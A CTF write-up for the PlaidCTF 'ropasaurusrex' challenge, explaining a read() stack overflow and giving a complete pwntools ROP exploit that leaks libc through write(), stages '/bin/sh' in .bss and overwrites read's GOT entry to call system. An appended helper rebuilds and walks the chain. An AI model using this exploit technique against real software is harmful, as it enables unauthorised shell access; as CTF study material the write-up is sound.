Plaidctf Ropasaurusrex Writeup

LeeDoHyun · March 17, 2020

This challenge is the ROP problem from PlaidCTF.

main calls sub_80483F4, and decompiling that function in IDA shows the overflow: read() accepts up to 0x100 bytes into a buffer that sits 0x88 bytes below the saved ebp, so the saved return address can be overwritten.

ssize_t sub_80483F4()
{
  char buf; // [esp+10h] [ebp-88h]

  return read(0, &buf, 0x100u);                 // overflow
}

The exploit is straightforward: leak read's address, stage "/bin/sh" in .bss, and call system. Concretely, write() leaks read's GOT entry, read() places "/bin/sh" in .bss and then overwrites read's GOT entry with system's address, so the final call through read@plt becomes system("/bin/sh").

ex.py

from pwn import *

context.log_level = "debug"
r = process("./ropasaurusrex")
e = ELF("./ropasaurusrex")
libc = e.libc

read_plt = e.plt["read"]
read_got = e.got["read"]
write_plt = e.plt["write"]
pppr = 0x80484b6            # pop; pop; pop; ret gadget, cleans the three args of each call
bss = e.bss()
binsh = b"/bin/sh\x00"

# buffer (0x88) + saved ebp (4) up to the return address
payload = b"A" * (0x88 + 0x4)

# 1. write(1, read@got, 4): leak the resolved address of read
payload += p32(write_plt)
payload += p32(pppr)
payload += p32(1)
payload += p32(read_got)
payload += p32(4)

# 2. read(0, bss, 8): store "/bin/sh\0" in .bss
payload += p32(read_plt)
payload += p32(pppr)
payload += p32(0)
payload += p32(bss)
payload += p32(len(binsh))

# 3. read(0, read@got, 4): overwrite read's GOT entry with system's address
payload += p32(read_plt)
payload += p32(pppr)
payload += p32(0)
payload += p32(read_got)
payload += p32(4)

# 4. read@plt(bss): the GOT entry now points at system, so this is system("/bin/sh")
payload += p32(read_plt)
payload += b"aaaa"          # dummy return address, never reached
payload += p32(bss)
r.sendline(payload)

# the 4 leaked bytes come back from stage 1
read_leak = u32(r.recv(4))
base = read_leak - libc.symbols["read"]
system = base + libc.symbols["system"]

info("read_leak = " + hex(read_leak))
info("base addr = " + hex(base))
info("system addr = " + hex(system))

# stage 2 consumes "/bin/sh\0", stage 3 consumes system's address
payload = binsh
payload += p32(system)
r.sendline(payload)
r.interactive()
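Added example, not code from the writeup: it rebuilds the same four frames with placeholder addresses, walks them the way `ret` would, and tracks the read@got overwrite, so the frame arithmetic (0x88 + 4 bytes of padding, three dwords consumed per pppr) can be checked without touching the binary. Only the pppr gadget and the padding come from the post; the PLT/GOT/bss addresses are assumptions.

```python
import struct

# Only PPPR (0x80484b6) and the 0x88+4 padding come from the writeup; the
# PLT/GOT/bss values are placeholders for e.plt/e.got/e.bss() of the real binary.
READ_PLT, WRITE_PLT = 0x08048340, 0x08048350   # placeholders
READ_GOT, BSS = 0x0804961c, 0x08049640         # placeholders
PPPR = 0x080484b6                              # pop edi; pop esi; pop ebx; ret
PADDING = 0x88 + 0x4                           # buffer + saved ebp
NAMES = {READ_PLT: "read@plt", WRITE_PLT: "write@plt", READ_GOT: "read@got", BSS: "bss"}

def p32(v):
    return struct.pack("<I", v)

def build_chain():
    """Same four frames as ex.py, built from the placeholder addresses."""
    binsh = b"/bin/sh\x00"
    chain = [WRITE_PLT, PPPR, 1, READ_GOT, 4,        # write(1, read@got, 4): leak
             READ_PLT, PPPR, 0, BSS, len(binsh),     # read(0, bss, 8): "/bin/sh"
             READ_PLT, PPPR, 0, READ_GOT, 4,         # read(0, read@got, 4): overwrite
             READ_PLT, 0x61616161, BSS]              # read@plt(bss) -> system("/bin/sh")
    return b"A" * PADDING + b"".join(p32(v) for v in chain)

def walk_chain(payload, padding=PADDING):
    """Walk the dwords after the padding the way `ret` would: each frame is
    [target, return slot, args...]. A PPPR return slot pops three args before the
    next frame; any other return value ends the walk, the rest being its args."""
    words = [struct.unpack("<I", payload[i:i + 4])[0]
             for i in range(padding, len(payload) - 3, 4)]
    frames, i = [], 0
    while i < len(words):
        target = words[i]
        if i + 1 < len(words) and words[i + 1] == PPPR:
            args, i = words[i + 2:i + 5], i + 5
        else:
            args, i = words[i + 2:], len(words)
        frames.append((NAMES.get(target, hex(target)), args))
    return frames

def resolve_calls(frames):
    """Map each PLT frame to the libc function it actually reaches, tracking the
    read@got overwrite so the final read@plt frame resolves to system."""
    got_read = "read"
    calls = []
    for name, args in frames:
        func = got_read if name == "read@plt" else name.split("@")[0]
        calls.append((func, args))
        if func == "read" and len(args) == 3 and args[1] == READ_GOT:
            got_read = "system"            # frame 3 wrote system's address here
    return calls
```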
